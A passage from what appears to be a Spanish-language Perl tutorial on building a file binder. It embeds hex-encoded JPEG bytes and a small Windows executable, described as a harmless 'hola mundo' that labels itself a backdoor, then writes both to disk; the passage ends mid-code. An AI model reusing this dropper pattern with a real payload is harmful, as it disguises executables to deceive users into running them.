cf3c55607cf3c8d8e28da5cf7b8ec1a02abe97a337683a9d99fb713e3c1e31fb5389e36efe51fae7cc0ff0021e692cb2e4ec8fdd0fa3fb27c86a2b873bab0be0867777becfbed24dbf3f7bf647dfe0b68c7e3a962a9c74e8568eb578c6cd8e36ec07fbf35e85caabcf170b9441c000740b944404444044440444404444044440444404444044441c2cf757e87bf5f26fd4fa40b22c8104daa67932d0f41fb5f9f5e47ae86b844c4eb9866584d6343312474dcc7d5c8f198e6a728d9f1b83493d7a8e5b2b0a8fd691d5835be9ab1dc3193cded11ba60d1c4efe2c6cd27c7aa88d539ab18ccde0e1ab4e7baf92495e6bc0377bc0611cbcf6e2df6f456dbb699374eeb2ce8abb06bac13e5305b9e5c6d81f8a0bd13a2737c39efcbafaf82958b338ab0ce387274e56efb71327691f628d62d59f12f6a2f37e92a1ffd6d7ffd56ff009af0dbd57a7a935c67ccd31c2762d6cc1ee1f26ee513b884baf3643234f154df72f4ec8208c6ee7b8fd8799f40aac75cdbcc48eada47056b292efb77ef61642c3e64ff00996a94c4f65f732b723ca6b9c87b7cade71d084910c7e848db7f80f2e64a6d8df3d63c7284a7472fdaa5c1b364c7e98865f79e793ed6de03fdec3d485af51a55b1b4a1a54e26c35e060646c6f4680bb21862af0b218636c7146d0d6318360d03a003c1762ab8ad69b4ee4444440888808888088880888808888088880888808888088880888808888283da4f14198d2970ec58cc83a1209d8ef237607ec578a42eff008ada6411ee7716b63ebddf3fdca73b51a4fb5a26c59886f2e3a465c67fe43b9fb6eabb6ec81acb47e5e37010cd2be1dc8dc7f1b1fbbf32a5b567f0e61a3ddc6d0c945dd5fa55ed47fb33441e3e842af5becbf45dd3bc98181849e2fe25ef8bff00691cbd15ad1431524763fa1c389fd10f20f81b52ec3fc4a468f675a3f1c5a60c0547168e4666994f5dff005c9e7eaaca883e228628236c50c6d8d8de4d6b06c07c97da22022220ffd6d991110111101111011110111101111011110111101111011110111101111074daad15ca92d599bc514cc2c7b7cc11b158ecf52d45a42c503bbb23a66e07337ea446ee261f818cad86eddad8ea535cb73361af034be491e760d016633e7a1bdaca2c9d2c56423c7e4e1104f62683863908fe6dfd771b825bef01cb646b8bcebf569b46e4390a105daee0e86c46d9187cc11b85e8599d2c66a5a34462a967db431f59eef6631576c929613b80e2ee400df61b78295d05a83296f2798c0662cb6ed8c6398596db186778c78dc0701c811fefa22b6c76ac6e57744445044440444404444044440444404444044440444404444044440444404444044440444415cd7d82b9a8f48dbc763dcd161c58f635e760fe17077093e1becaad2e5f3f4a4a50dfd36691b53b6b87bedb1cde2d893b06ee480013e1d3aad3151bb50ad762a58dcf546095987b2669e12ee1e28c8d891bf88fde8d2979acf0f0e6aac7733584ad667b3155b561f0482bcef89c498cb9bcda478b7eeae581d3589d3555f5f155bb96c8ee291ce7173a43e649e65675a7724fed0b53e3ec50af2418ac3cded333e7e10e7cbb6cc68009f32775ad2994e5b45adc0888a1908888088880888808888088880888808888088883ffd7d99111011110111107ffd9";
my $valor_dos =
"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010500d750435100160000d2010000e00007030b010238000a000000120000000200002012000000100000002000000000400000100000000200000400000001000000040000000000000000600000000400004252000003000000000020000010000000001000001000000000000010000000000000000000000000500000ac020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e746578740000003009000000100000000a000000040000000000000000000000000000600000602e64617461000000400000000020000000020000000e0000000000000000000000000000400000c02e7264617461000000010000003000000002000000100000000000000000000000000000400000402e62737300000000b0000000004000000000000000000000000000000000000000000000800000c02e69646174610000ac020000005000000004000000120000000000000000000000000000400000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005589e583ec18895df88b550831db8975fc8b0231f68b003d910000c077433d8d0000c0725bbe01000000c704240800000031c089442404e89407000083f801746c85c0742ac7042408000000ffd0bbffffffff89d88b75fc8b5df889ec5dc204003d930000c074bd3d940000c074bb89d88b75fc8b5df889ec5dc204008d76003d050000c075e8c704240b00000031f689742404e83707000083f801743485c074cdc704240b000000ffd0eba1c7042408000000bb01000000895c2404e80e07000085f67488e845020000bbffffffffeb81c704240b000000b901000000bbffffffff894c2404e8e4060000e962ffffffeb0d909090909090909090909090905589e55383ec248d5df8c7042400104000e86a07000083ec04e8f2010000c745f800000000b8004040008d55f4895c24108b0d002040008944240489542408894c240cc7042404404000e8b1060000a11040400085c07458a3102040008b15dc50400085d20f858b00000083fae07420a110404000894424048b1ddc5040008b4b30890c24e8660600008b15dc50400083fac0741b8b1d10404000895c24048b0ddc5040008b5150891424e840060000e82b0600008b1d102040008918e81e01000083e4f0e8f60500008b08894c24088b150040400089542404a104404000890424e8a900000089c3e8c2050000891c24e89a060000894424048b15dc5040008b4210890424e8e50500008b15dc504000e955ffffff8d76008dbc27000000005589e583ec08c7042401000000ff15d0504000e8c8feffff908db426000000005589e583ec08c7042402000000ff15d0504000e8a8feffff908db42600000000558b0dec50400089e55dffe18d742600558b0de050400089e55dffe1909090905589e55de957020000909090909090905589e583ec0883e4f0b80000000083c00f83c00fc1e804c1e0048945fc8b45fce86b040000e806010000c7042400304000e84a050000e815060000b800000000c9c3909090909090909090909090909055b90031400089e5eb148db6000000008b51048b0183c10801820000400081f90031400072ea5dc390909090909090905589e5dbe35dc39090909090909090905589e583ec08a1202040008b0885c97426eb0d90909090909090909090909090ff108b0d202040008b51048d4104a32020400085d275e9c9c38db426000000005589e55383ec04a11c19400083f8ff742985c089c3741389f68dbc2700000000ff149d1c1940004b75f6c7042420134000e8cafeffff5b5b5dc38b0d2019400031c085c9eb0a408b14852019400085d275f4ebbd8db6000000008dbf000000005589e55383ec04a12040400085c07536a11c194000bb01000000891d2040400083f8ff742585c089c3740f908d742600ff149d1c1940004b75f6c7042420134000e85afeffff5b5b5dc38b0d2019400031c085c9eb0a408b14852019400085d275f4ebc190909090909090909090909055a17040400089e55d8b4804ffe189f655ba4200000089e5530fb7c083ec64895424088d55a831db89542404890424ff15b4504000ba1f000000b90100000083ec0c85c07507eb4601c94a780e807c2aa84175f409cb01c94a79f2833b3c750789d88b5dfcc9c3b944304000baea000000894c240c89542408c7042471304000b89030400089442404e892020000b8bc304000bbe40000008944240c895c2408ebd78db426000000008dbc27000000005589e557565381eccc0000008b0d7040400085c974088d65f45b5e5f5dc3c7459841414141a1203040008d7598c7459c41414141c745a0414141418945b8a124304000c745a441414141c745a8414141418945bca128304000c745ac41414141c745b0414141418945c0a12c304000c745b4414141418945c4a1303040008945c8a1343040008945cca1383040008945d0a13c3040008945d40fb70540304000668945d8893424ff15b05040000fb7c083ec0485c0898544ffffff0f853b010000c704243c000000e89302000085c089c30f8459010000fc89c78b8544ffffffb90f000000f3abc7430450184000b901000000c7430830144000a140404000c7033c0000008b1544404000c7432800000000894314a1302040008953188b153420400089431ca150404000895320c74330ffffffff89432c8b153c204000a138204000895338ba1f00000089433489f689d821c883f80119c0242001c9044188842a48ffffff4a79e7a120304000898568ffffffa12430400089856cffffffa128304000898570ffffffa12c304000898574ffffffa130304000898578ffffffa13430400089857cffffffa138304000894580a13c3040008945840fb70540304000668945888d8548ffffff890424ff15a85040000fb7f883ec0485ff754231d285d2751e891c24e863010000893424ff15b050400083ec040fb7c0e85ffdffff89c3891d704040008d4304a3604040008d4308a3804040008d65f45b5e5f5dc389f8e838fdffff39d889fa75b1ebb1e83b01000090909090909090909090905189e183c1083d00100000721081e9001000008309002d00100000ebe929c183090089e089cc8b088b4004ffe09090905589e583ec188b4514894424108b45108944240c8b450c894424088b450889442404a1dc50400083c040890424e8ee000000a1dc50400083c040890424e8ce000000e8b9000000909090909090909090ff25d050400090900000000000000000ff25d450400090900000000000000000ff25c850400090900000000000000000ff250451400090900000000000000000ff25cc50400090900000000000000000ff25e450400090900000000000000000ff25c450400090900000000000000000ff250051400090900000000000000000ff25d850400090900000000000000000ff25f850400090900000000000000000ff25fc50400090900000000000000000ff25e850400090900000000000000000ff25f050400090900000000000000000ff25f450400090900000000000000000ff25b850400090900000000000000000ff25ac50400090900000000000000000ff25b450400090900000000000000000ff25b050400090900000000000000000ff25a8504000909000000000000000005589e55de9a7f9ffff909090909090905589e583ec08a1dc504000ff4804837804007811a1dc5040008b100fb6128955fcff00eb10a1dc504000890424e80effffff8945fc8b45fcc9c39090ffffffffd018400000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000004000000000000000000000000000002c19400000000000000000000000000000000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000536f7920756e204261636b646f6f7220784444440000000000000000000000002d4c49424743435733322d45482d322d534a4c4a2d475448522d4d494e475733320000007733325f7368617265647074722d3e73697a65203d3d2073697a656f66285733325f45485f534841524544290025733a25753a206661696c656420617373657274696f6e20602573270a00002e2e2f2e2e2f6763632f6763632f636f6e6669672f693338362f7733322d7368617265642d7074722e63000047657441746f6d4e616d6541202861746f6d2c20732c2073697a656f662873292920213d2030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004050000000000000000000004c520000a85000005c5000000000000000000000a0520000c45000000000000000000000000000000000000000000000000000000c51000018510000285100003451000044510000000000000000000064510000745100008451000094510000a8510000b4510000c0510000c8510000d4510000e0510000e8510000f4510000005200000c52000014520000205200002c52000000000000000000000c51000018510000285100003451000044510000000000000000000064510000745100008451000094510000a8510000b4510000c0510000c8510000d4510000e0510000e8510000f4510000005200000c52000014520000205200002c52000000000000010041646441746f6d4100009b004578697450726f63657373000000af0046696e6441746f6d4100dc0047657441746f6d4e616d65410000df02536574556e68616e646c6564457863657074696f6e46696c74657200000027005f5f6765746d61696e61726773003c005f5f705f5f656e7669726f6e00003e005f5f705f5f666d6f64650000000050005f5f7365745f6170705f747970650000000079005f636578697400000000aa005f66696c627566000000e9005f696f6200005e015f6f6e6578697400000084015f7365746d6f64650000150261626f7274001c0261746578697400000000300266666c757368000000003902667072696e74660000003f0266726565000072026d616c6c6f63000000007f027072696e74660000000090027369676e616c0000000000500000005000000050000000500000005000004b45524e454c33322e646c6c0000000014500000145000001450000014500000145000001450000014500000145000001450000014500000145000001450000014500000145000001450000014500000145000006d73766372742e646c6c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e66696c650000000f000000feff00006701637274312e63000000000000000000000000000000000400000000000000010020000301000000000000000000000000000000000000000000001e000000000100000100200003000000000032000000200200000100200002000000000042000000400200000100200002005f61746578697400600200000100200002005f5f6f6e65786974700200000100200002002e74657874000000000000000100000003017c02000026000000000000000000000000002e64617461000000000000000200000003010000000000000000000000000000000000002e62737300000000000000000400000003010800000000000000000000000000000000002e66696c6500000019000000feff0000670163727473747566662e6300000000000000000000000055000000800200000100200002010000000000000000000000000000000000002e74657874000000800200000100000003010900000001000000000000000000000000002e64617461000000000000000200000003010000000000000000000000000000000000002e62737300000000100000000400000003010000000000000000000000000000000000002e66696c6500000027000000feff00006701686f6c616d756e646f2e63707000000000005f6d61696e000000900200000100200002000000000065000000e00800000100000003013a00000004000000000000000000020000005f67657463686172e00800000100200002002e74657874000000900200000100000003014200000005000000000000000000000000002e64617461000000000000000200000003010000000000000000000000000000000000002e62737300000000100000000400000003010000000000000000000000000000000000002e72646174610000000000000300000003011500000000000000000000000000000000002e66696c650000002f000000feff00006701435254676c6f622e630000000000000000002e74657874000000e00200000100000003010000000000000000000000000000000000002e64617461000000000000000200000003010400000000000000000000000000000000002e62737300000000100000000400000003010000000000000000000000000000000000002e66696c6500000037000000feff00006701435254666d6f64652e6300000000000000002e74657874000000e00200000100000003010000000000000000000000000000000000002e64617461000000100000000200000003010000000000000000000000000000000000002e62737300000000100000000400000003010400000000000000000000000000000000002e66696c650000003f000000feff000067017478746d6f64652e630000000000000000002e74657874000000e00200000100000003010000000000000000000000000000000000002e64617461000000100000000200000003010400000000000000000000000000000000002e62737300000000200000000400000003010000000000000000000000000000000000002e66696c6500000049000000feff0000670170736575646f2d72656c6f632e63000000000000000073000000e00200000100200002010000000000000000000000000000000000002e74657874000000e00200000100000003012800000003000000000000000000000000002e64617461000000200000000200000003010000000000000000000000000000000000002e62737300000000200000000400000003010000000000000000000000000000000000002e66696c6500000054000000feff000067014352545f667031302e6300000000000000005f6670726573657410030000010020000201000000000000000000000000000000000000000000008e000000100300000100200002002e74657874000000100300000100000003010700000000000000000000000000000000002e64617461000000200000000200000003010000000000000000000000000000000000002e62737300000000200000000400000003010000000000000000000000000000000000002e66696c6500000062000000feff000067016763636d61696e2e63000000000000000000000000009800000020000000040000000300702e3000000000002000000002000000030000000000a50000002003000001002000020100000000000000000000000000000000000000000000b8000000600300000100200002005f5f5f6d61696e00c00300000100200002002e74657874000000200300000100000003010401000011000000000000000000000000002e64617461000000200000000200000003010400000001000000000000000000000000002e62737300000000200000000400000003011000000000000000000000000000000000002e66696c6500000008010000feff0000670100000000cb000000000000000000000000002e74657874000000300400000100000003010000000000000000000000000000000000002e64617461000000300000000200000003010000000000000000000000000000000000002e627373000000003000000004000000030102000000000000000000000000000000000000000000df0000002000000003000000030000000000f000000030040000010020000301000000000000000000000000000000000000000000001401000040040000010020000300000000002901000040000000040000000300000000003c01000030000000020000000300000000004701000050000000040000000300000000005401000038000000020000000300000000005f010000e00400000100200002002e7465787400000030040000010000000301e50200002c000000000000000000000000002e64617461000000300000000200000003011000000000000000000000000000000000002e62737300000000400000000400000003012000000000000000000000000000000000002e7264617461000020000000030000000301c3000000000000000000000000000000000070726f626500000026070000010000000600646f6e65000000003d0700000100000006002e74657874000000200700000100000003012d00000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e74657874000000500700000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e6273730000000060000000040000000301000000000000000000000000000000000000000000007b010000500700000100200002010000000000000000000000000000000000002e74657874000000500700000100000003014700000005000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e74657874000000a00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437740200000500000003002e69646174612435dc0000000500000003002e69646174612434740000000500000003002e69646174612436c00100000500000003002e74657874000000a00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437680200000500000003002e69646174612435d00000000500000003002e69646174612434680000000500000003002e69646174612436940100000500000003002e74657874000000b00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437840200000500000003002e69646174612435ec0000000500000003002e69646174612434840000000500000003002e69646174612436e80100000500000003002e74657874000000b00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437780200000500000003002e69646174612435e00000000500000003002e69646174612434780000000500000003002e69646174612436c80100000500000003002e74657874000000b00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124376c0200000500000003002e69646174612435d40000000500000003002e696461746124346c0000000500000003002e69646174612436a80100000500000003002e74657874000000c00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437600200000500000003002e69646174612435c80000000500000003002e69646174612434600000000500000003002e69646174612436740100000500000003002e74657874000000d00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124379c0200000500000003002e69646174612435040100000500000003002e696461746124349c0000000500000003002e696461746124362c0200000500000003002e74657874000000e00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437640200000500000003002e69646174612435cc0000000500000003002e69646174612434640000000500000003002e69646174612436840100000500000003002e74657874000000f00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124377c0200000500000003002e69646174612435e40000000500000003002e696461746124347c0000000500000003002e69646174612436d40100000500000003002e74657874000000000800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124375c0200000500000003002e69646174612435c40000000500000003002e696461746124345c0000000500000003002e69646174612436640100000500000003002e74657874000000100800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437980200000500000003002e69646174612435000100000500000003002e69646174612434980000000500000003002e69646174612436200200000500000003002e74657874000000200800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437700200000500000003002e69646174612435d80000000500000003002e69646174612434700000000500000003002e69646174612436b40100000500000003002e74657874000000300800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437900200000500000003002e69646174612435f80000000500000003002e69646174612434900000000500000003002e696461746124360c0200000500000003002e74657874000000400800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437940200000500000003002e69646174612435fc0000000500000003002e69646174612434940000000500000003002e69646174612436140200000500000003002e74657874000000500800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437800200000500000003002e69646174612435e80000000500000003002e69646174612434800000000500000003002e69646174612436e00100000500000003002e74657874000000600800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437880200000500000003002e69646174612435f00000000500000003002e69646174612434880000000500000003002e69646174612436f40100000500000003002e74657874000000700800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124378c0200000500000003002e69646174612435f40000000500000003002e696461746124348c0000000500000003002e69646174612436000200000500000003002e66696c6500000018010000feff0000670166616b650000000000000000000000000000686e616d650000005c000000050000000300667468756e6b0000c40000000500000003002e74657874000000800800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612432140000000500000003011400000003000000000000000000000000002e69646174612435c00000000500000003010400000000000000000000000000000000002e69646174612434580000000500000003010400000000000000000000000000000000002e66696c6500000049010000feff0000670166616b6500000000000000000000000000002e74657874000000800800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612434a00000000500000003010400000000000000000000000000000000002e69646174612435080100000500000003010400000000000000000000000000000000002e69646174612437a00200000500000003010b00000000000000000000000000000000002e74657874000000800800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437480200000500000003002e69646174612435b80000000500000003002e69646174612434500000000500000003002e69646174612436440100000500000003002e74657874000000900800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124373c0200000500000003002e69646174612435ac0000000500000003002e69646174612434440000000500000003002e69646174612436180100000500000003002e74657874000000a00800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437440200000500000003002e69646174612435b40000000500000003002e696461746124344c0000000500000003002e69646174612436340100000500000003002e74657874000000b00800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437400200000500000003002e69646174612435b00000000500000003002e69646174612434480000000500000003002e69646174612436280100000500000003002e74657874000000c00800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437380200000500000003002e69646174612435a80000000500000003002e69646174612434400000000500000003002e696461746124360c0100000500000003002e66696c6500000059010000feff0000670166616b650000000000000000000000000000686e616d6500000040000000050000000300667468756e6b0000a80000000500000003002e74657874000000d00800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612432000000000500000003011400000003000000000000000000000000002e69646174612435a40000000500000003010400000000000000000000000000000000002e696461746124343c0000000500000003010400000000000000000000000000000000002e66696c6500000067010000feff0000670166616b6500000000000000000000000000002e74657874000000d00800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612434540000000500000003010400000000000000000000000000000000002e69646174612435bc0000000500000003010400000000000000000000000000000000002e696461746124374c0200000500000003010d00000000000000000000000000000000002e66696c6500000073010000feff0000670163727473747566662e6300000000000000000000000086010000d00800000100200003010000000000000000000000000000000000002e74657874000000d00800000100000003010900000001000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e63746f72730000200900000100000003010400000001000000000000000000000000005f5f636578697400b007000001002000020000000000980100000001000003000000020000000000b7010000e400000005000000020000000000c70100000000000002000000020000000000d6010000280900000100000002005f667265650000003008000001002000020000000000e5010000e000000005000000020000000000f4010000e0070000010020000200000000000002000080080000010000000200000000001f02000060000000040000000200000000003a020000000000000100000002000000000049020000a0020000050000000200000000005d020000b00000000500000002000000000070020000e8000000050000000200000000007d02000000100000ffff00000200000000009602000000002000ffff0000020000000000b002000004000000ffff0000020000000000cc0200000000000001000000020000000000de020000c008000001000000020000000000ea0200000000000001000000020000000000fc020000200700000100000002000000000006030000000000000100000002000000000016030000c8000000050000000200000000002a030000dc0000000500000002005f5f66696c62756620080000010020000200000000003603000000000000040000000200000000004403000000010000030000000200000000006703000000100000ffff00000200000000007f030000c0070000010020000200000000008d03000000000000010000000200000000009f0300000000000001000000020000000000af030000040100000500000002005f5f646c6c5f5f0000000000ffff0000020000000000bd03000000000000ffff0000020000000000d2030000ec00000005000000020000000000e00300001400000005000000020000000000f303000000004000ffff00000200000000000204000000100000ffff000002000000000018040000000100000300000002000000000036040000cc0000000500000002005f5f6172676300000400000004000000020000000000480400009008000001000000020000000000570400004000000002000000020000000000640400000008000001002000020000000000730400007000000004000000020000000000840400001c0900000100000002000000000092040000a00700000100000002005f66666c757368006008000001002000020000000000a2040000b000000004000000020000000000ae0400001000000004000000020000000000ba040000000000000100000002005f667072696e7466700800000100200002005f5f616c6c6f63612007000001000000020000000000ca040000000000000100000002005f5f6172677600000000000004000000020000000000dc0400001c09000001000000020000000000eb040000b40000000500000002005f5f666d6f64650010000000020000000200000000000205000000020000ffff000002000000000015050000fc000000050000000200000000002305000004000000ffff000002005f5f656e645f5f00000000000100000002005f7369676e616c00d00700000100200002005f6d616c6c6f6300400800000100200002000000000038050000280900000100000002000000000046050000f4000000050000000200000000005505000000001000ffff00000200000000006e05000000000000010000000200000000008005000003000000ffff00000200000000008e050000f00000000500000002005f61626f7274000050080000010020000200000000009c0500008000000004000000020000000000b8050000c400000005000000020000000000cd0500000000000001000000020000000000da050000ac00000005000000020000000000ef050000f800000005000000020000000000fb050000b8000000050000000200000000002006000001000000ffff00000200000000003806000000000000ffff000002000000000049060000000000000200000002000000000054060000f0070000010020000200000000005e06000000010000050000000200000000006c060000a8000000050000000200000000007e060000000000000500000002000000000093060000d400000005000000020000000000a106000000000000ffff0000020000000000bd06000000000000ffff0000020000000000d5060000d800000005000000020000000000e4060000d000000005000000020000000000fa060000b00800000100000002005f7072696e746600100800000100200002000000000007070000a0080000010000000200000000001807000000010000030000000200000000003a0700004c020000050000000200000000005007000000000000010000000200600700005f5f676e755f657863657074696f6e5f68616e646c65724034005f5f5f6d696e67775f43525453746172747570005f6d61696e43525453746172747570005f57696e4d61696e43525453746172747570005f5f5f646f5f736a6c6a5f696e6974002e746578742467657463686172005f5f7065693338365f72756e74696d655f72656c6f6361746f72005f5f66707265736574005f696e697469616c697a6564005f5f5f646f5f676c6f62616c5f64746f7273005f5f5f646f5f676c6f62616c5f63746f72730070736575646f2d72656c6f632d6c6973742e63005f7733325f61746f6d5f737566666978005f5f5f7733325f7368617265647074725f64656661756c745f756e6578706563746564005f5f5f7733325f7368617265647074725f676574006477325f6f626a6563745f6d757465782e30006477325f6f6e63652e3100736a6c5f66635f6b65792e3200736a6c5f6f6e63652e33005f5f5f7733325f7368617265647074725f696e697469616c697a65005f5f5f657072696e7466005f5f5f736a6c6a5f696e69745f63746f72005f5f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f5f005f5f696d705f5f5f7365746d6f6465005f5f646174615f73746172745f5f005f5f5f44544f525f4c4953545f5f005f5f696d705f5f5f6f6e65786974005f5f5f705f5f666d6f6465005f536574556e68616e646c6564457863657074696f6e46696c7465724034005f5f5f7733325f7368617265647074725f7465726d696e617465005f5f5f746c735f73746172745f5f005f5f6c69626d73766372745f615f696e616d65005f5f696d705f5f46696e6441746f6d414034005f5f696d705f5f61626f7274005f5f73697a655f6f665f737461636b5f636f6d6d69745f5f005f5f73697a655f6f665f737461636b5f726573657276655f5f005f5f6d616a6f725f73756273797374656d5f76657273696f6e5f5f005f5f5f6372745f786c5f73746172745f5f005f41646441746f6d414034005f5f5f6372745f78695f73746172745f5f005f5f5f63686b73746b005f5f5f6372745f78695f656e645f5f005f5f696d705f5f5f5f705f5f656e7669726f6e005f5f696d705f5f5f696f62005f5f6273735f73746172745f5f005f5f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f454e445f5f005f5f73697a655f6f665f686561705f636f6d6d69745f5f005f5f5f705f5f656e7669726f6e005f5f5f6372745f78705f73746172745f5f005f5f5f6372745f78705f656e645f5f005f5f696d705f5f7369676e616c005f5f6d696e6f725f6f735f76657273696f6e5f5f005f5f696d705f5f617465786974005f5f686561645f6c69626d73766372745f61005f5f696d6167655f626173655f5f005f5f73656374696f6e5f616c69676e6d656e745f5f005f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f5f005f5f696d705f5f5f5f705f5f666d6f6465005f4578697450726f636573734034005f5f646174615f656e645f5f005f5f5f6765746d61696e61726773005f5f5f7733325f736861726564707472005f5f43544f525f4c4953545f5f005f5f5f7365745f6170705f74797065005f5f6273735f656e645f5f005f5f4352545f666d6f6465005f5f5f6372745f78635f656e645f5f005f5f5f6372745f78635f73746172745f5f005f5f5f43544f525f4c4953545f5f005f5f696d705f5f47657441746f6d4e616d6541403132005f5f66696c655f616c69676e6d656e745f5f005f5f696d705f5f6d616c6c6f63005f5f6d616a6f725f6f735f76657273696f6e5f5f005f5f44544f525f4c4953545f5f005f5f696d705f5f667072696e7466005f5f73697a655f6f665f686561705f726573657276655f5f005f5f5f6372745f78745f73746172745f5f005f5f73756273797374656d5f5f005f5f696d705f5f66666c757368005f5f5f7733325f7368617265647074725f756e6578706563746564005f5f696d705f5f5f5f6765746d61696e61726773005f5f5f746c735f656e645f5f005f5f696d705f5f4578697450726f636573734034005f5f696d705f5f66726565005f5f696d705f5f536574556e68616e646c6564457863657074696f6e46696c7465724034005f5f6d616a6f725f696d6167655f76657273696f6e5f5f005f5f6c6f616465725f666c6167735f5f005f5f4352545f676c6f62005f5f7365746d6f6465005f5f696d705f5f7072696e7466005f5f696d705f5f41646441746f6d414034005f5f686561645f6c69626b65726e656c33325f61005f5f696d705f5f5f6365786974005f5f6d696e6f725f73756273797374656d5f76657273696f6e5f5f005f5f6d696e6f725f696d6167655f76657273696f6e5f5f005f5f696d705f5f5f66696c627566005f5f696d705f5f5f5f7365745f6170705f74797065005f46696e6441746f6d414034005f47657441746f6d4e616d6541403132005f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f454e445f5f005f5f6c69626b65726e656c33325f615f696e616d65005f5f5f6372745f78745f656e645f5f00";

Como ven , usamos primero los bytes de la imagen y despues los del archivo exe que es un simple hola mundo en c.

Ahora nos toca crear los archivos :

Código: perl


open( NOMBRE_UNO, ">>" . $nombre_uno )
  ;    ## Creamos el archivo con el nombre marcado en el codigo anterior
binmode(NOMBRE_UNO);    # Lo abrimos de forma binaria
my $test_uno = pack "H*",
  $valor_uno;           # Decodificamos el hexadecimal (gracias a explorer)

print NOMBRE_UNO $test_uno
  ;    # Escribimos el resultado de la decodificacion en el archivo creado
close(NOMBRE_UNO);    # Cerramos el archivo

open( NOMBRE_DOS, ">>" . $nombre_dos );    # Lo mismo pero con el otro archivo
binmode(NOMBRE_DOS);                       # Lo mismo pero con el otro archivo
my $test_dos = pack "H*", $valor_dos;      # Lo mismo pero con el otro archivo

